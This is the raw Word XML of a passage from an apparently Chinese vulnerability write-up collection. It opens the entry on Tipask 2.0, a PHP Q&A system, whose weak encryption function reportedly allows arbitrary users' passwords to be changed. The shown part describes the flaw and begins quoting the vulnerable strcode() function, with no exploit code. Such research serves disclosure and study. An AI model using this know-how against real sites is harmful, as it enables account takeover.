    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="192" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317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然后设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>并登陆，浏览器要与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">poc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中设置的浏览器一致，否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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>则会登陆失败</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4257911" cy="528066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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911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spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="453"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="Tipask_2.0_加密函数破解导致任意用户密码修改"/>
      <w:bookmarkStart w:id="72" w:name="_bookmark33"/>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipask 2.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加密函数破解导致任意用户密码修</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="260"/>
        <w:ind w:left="417" w:right="453"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：猪头子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="109" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="270"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问答系统是一款开放源码的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PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>仿百度知道程序。以国人的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使用习惯为设计理念，采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-69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MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构架，系统具有速度快，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SEO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>友好，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界面操作简洁明快等特点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="36" w:line="309" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="453"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-82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Tipask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中使用的加密算法存在被破解的可能性，因此将导致包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3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任意用户密码修改等漏洞的发生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="453"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s5950" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:16.65pt;width:337.75pt;height:230.4pt;z-index:6496;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,333" coordsize="6755,4608">
            <v:rect id="_x0000_s6088" style="position:absolute;left:1617;top:338;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6087" style="position:absolute;left:1797;top:551;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6086" style="position:absolute;left:2038;top:551;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6085" style="position:absolute;left:2138;top:551;width:1800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6084" style="position:absolute;left:3938;top:551;width:843;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6083" style="position:absolute;left:4781;top:551;width:200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6082" style="position:absolute;left:4981;top:551;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6081" style="position:absolute;left:5704;top:551;width:200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6080" style="position:absolute;left:5904;top:551;width:894;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6079" style="position:absolute;left:6798;top:551;width:1000;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6078" style="position:absolute;left:7798;top:551;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6077" style="position:absolute;left:7898;top:551;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6076" style="position:absolute;left:1617;top:844;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6075" style="position:absolute;left:1797;top:907;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6074" style="position:absolute" from="2790,907" to="2790,1107" strokecolor="#f8f8f8" strokeweight="2.95pt"/>
            <v:rect id="_x0000_s6073" style="position:absolute;left:2820;top:907;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6072" style="position:absolute" from="4778,907" to="4778,1107" strokecolor="#f8f8f8" strokeweight="3pt"/>
            <v:rect id="_x0000_s6071" style="position:absolute;left:4808;top:907;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6070" style="position:absolute" from="6043,907" to="6043,1107" strokecolor="#f8f8f8" strokeweight="3pt"/>
            <v:rect id="_x0000_s6069" style="position:absolute;left:6073;top:907;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6068" style="position:absolute" from="7067,907" to="7067,1107" strokecolor="#f8f8f8" strokeweight="3pt"/>
            <v:rect id="_x0000_s6067" style="position:absolute;left:7097;top:907;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6066" style="position:absolute;left:8182;top:907;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6065" style="position:absolute;left:1617;top:1170;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6064" style="position:absolute;left:1797;top:1233;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6063" style="position:absolute;left:1617;top:1496;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6062" type="#_x0000_t75" style="position:absolute;left:1797;top:1559;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6061" style="position:absolute;left:2197;top:1559;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6060" style="position:absolute;left:2679;top:1559;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6059" style="position:absolute;left:2799;top:1559;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6058" style="position:absolute;left:2920;top:1559;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6057" style="position:absolute;left:3040;top:1559;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6056" style="position:absolute;left:5450;top:1559;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6055" style="position:absolute;left:5571;top:1559;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6054" style="position:absolute;left:7740;top:1559;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6053" style="position:absolute;left:7860;top:1559;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6052" style="position:absolute;left:7981;top:1559;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6051" style="position:absolute;left:1617;top:1822;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6050" style="position:absolute;left:1797;top:1885;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6049" style="position:absolute;left:3122;top:1885;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6048" style="position:absolute;left:3243;top:1885;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6047" style="position:absolute;left:3484;top:1885;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6046" style="position:absolute;left:3604;top:1885;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6045" style="position:absolute;left:1617;top:2148;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6044" type="#_x0000_t75" style="position:absolute;left:1797;top:2211;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6043" style="position:absolute;left:2197;top:2211;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6042" style="position:absolute;left:3040;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6041" style="position:absolute;left:3161;top:2211;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6040" style="position:absolute;left:3281;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6039" style="position:absolute;left:3402;top:2211;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6038" style="position:absolute;left:4245;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6037" style="position:absolute;left:4366;top:2211;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6036" style="position:absolute;left:4607;top:2211;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6035" style="position:absolute;left:4727;top:2211;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6034" style="position:absolute;left:5691;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6033" style="position:absolute;left:5812;top:2211;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6032" style="position:absolute;left:5932;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6031" style="position:absolute;left:6053;top:2211;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6030" style="position:absolute;left:6896;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6029" style="position:absolute;left:7017;top:2211;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6028" style="position:absolute;left:7137;top:2211;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6027" style="position:absolute;left:1617;top:2474;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6026" style="position:absolute;left:1797;top:2537;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6025" style="position:absolute;left:1617;top:2800;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6024" type="#_x0000_t75" style="position:absolute;left:1797;top:2863;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6023" style="position:absolute;left:2197;top:2863;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6022" style="position:absolute;left:2679;top:2863;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6021" style="position:absolute;left:2799;top:2863;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6020" style="position:absolute;left:2920;top:2863;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6019" style="position:absolute;left:3040;top:2863;width:1567;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6018" style="position:absolute;left:1617;top:3126;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6017" type="#_x0000_t75" style="position:absolute;left:1797;top:3189;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6016" style="position:absolute;left:2197;top:3189;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6015" style="position:absolute;left:2799;top:3189;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6014" style="position:absolute;left:2920;top:3189;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6013" style="position:absolute;left:3040;top:3189;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6012" style="position:absolute;left:3161;top:3189;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6011" style="position:absolute;left:1617;top:3452;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6010" style="position:absolute;left:1797;top:3515;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6009" style="position:absolute;left:1897;top:3515;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6008" style="position:absolute;left:1997;top:3515;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6007" style="position:absolute;left:2097;top:3515;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6006" style="position:absolute;left:2197;top:3515;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6005" style="position:absolute;left:2558;top:3515;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6004" style="position:absolute;left:2679;top:3515;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6003" style="position:absolute;left:3040;top:3515;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6002" style="position:absolute;left:3161;top:3515;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6001" style="position:absolute;left:3281;top:3515;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6000" style="position:absolute;left:3402;top:3515;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5999" style="position:absolute;left:3643;top:3515;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5998" style="position:absolute;left:3763;top:3515;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5997" style="position:absolute;left:4004;top:3515;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5996" style="position:absolute;left:4125;top:3515;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5995" style="position:absolute;left:4245;top:3515;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5994" style="position:absolute;left:4366;top:3515;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5993" style="position:absolute;left:6294;top:3515;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5992" style="position:absolute;left:6414;top:3515;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5991" style="position:absolute;left:7017;top:3515;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5990" style="position:absolute;left:7137;top:3515;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5989" style="position:absolute;left:1617;top:3778;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5988" style="position:absolute;left:1797;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5987" style="position:absolute;left:1897;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5986" style="position:absolute;left:1997;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5985" style="position:absolute;left:2097;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5984" style="position:absolute;left:2197;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5983" style="position:absolute;left:2297;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5982" style="position:absolute;left:2397;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5981" style="position:absolute;left:2497;top:3841;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5980" style="position:absolute;left:2597;top:3841;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5979" style="position:absolute;left:2838;top:3841;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5978" style="position:absolute;left:2958;top:3841;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5977" style="position:absolute;left:3079;top:3841;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5976" style="position:absolute;left:3199;top:3841;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5975" style="position:absolute;left:3440;top:3841;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5974" style="position:absolute;left:3561;top:3841;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5973" style="position:absolute;left:3681;top:3841;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5972" style="position:absolute;left:3802;top:3841;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5971" style="position:absolute;left:1617;top:4104;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5970" style="position:absolute;left:1797;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5969" style="position:absolute;left:1897;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5968" style="position:absolute;left:1997;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5967" style="position:absolute;left:2097;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5966" style="position:absolute;left:2197;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5965" style="position:absolute;left:2297;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5964" style="position:absolute;left:2397;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5963" style="position:absolute;left:2497;top:4167;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5962" style="position:absolute;left:2597;top:4167;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5961" style="position:absolute;left:3199;top:4167;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5960" style="position:absolute;left:3320;top:4167;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5959" style="position:absolute;left:3561;top:4167;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5958" style="position:absolute;left:3681;top:4167;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5957" style="position:absolute;left:5007;top:4167;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5956" style="position:absolute;left:5127;top:4167;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5955" style="position:absolute;left:5248;top:4167;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5954" style="position:absolute;left:5368;top:4167;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5953" style="position:absolute;left:1617;top:4430;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5952" type="#_x0000_t75" style="position:absolute;left:1797;top:4493;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s5951" type="#_x0000_t202" style="position:absolute;left:1614;top:335;width:6750;height:4603" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="10"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="13"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="338" w:lineRule="auto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/*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通用加密解密函数，</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>phpwind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、</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>phpcms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、</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>dedecms</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-101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都用此函数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*/ function</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-67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strcode(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$string,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-6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$auth_key,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-6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$action=</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-6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'ENCODE')</w:t>
                    </w:r>
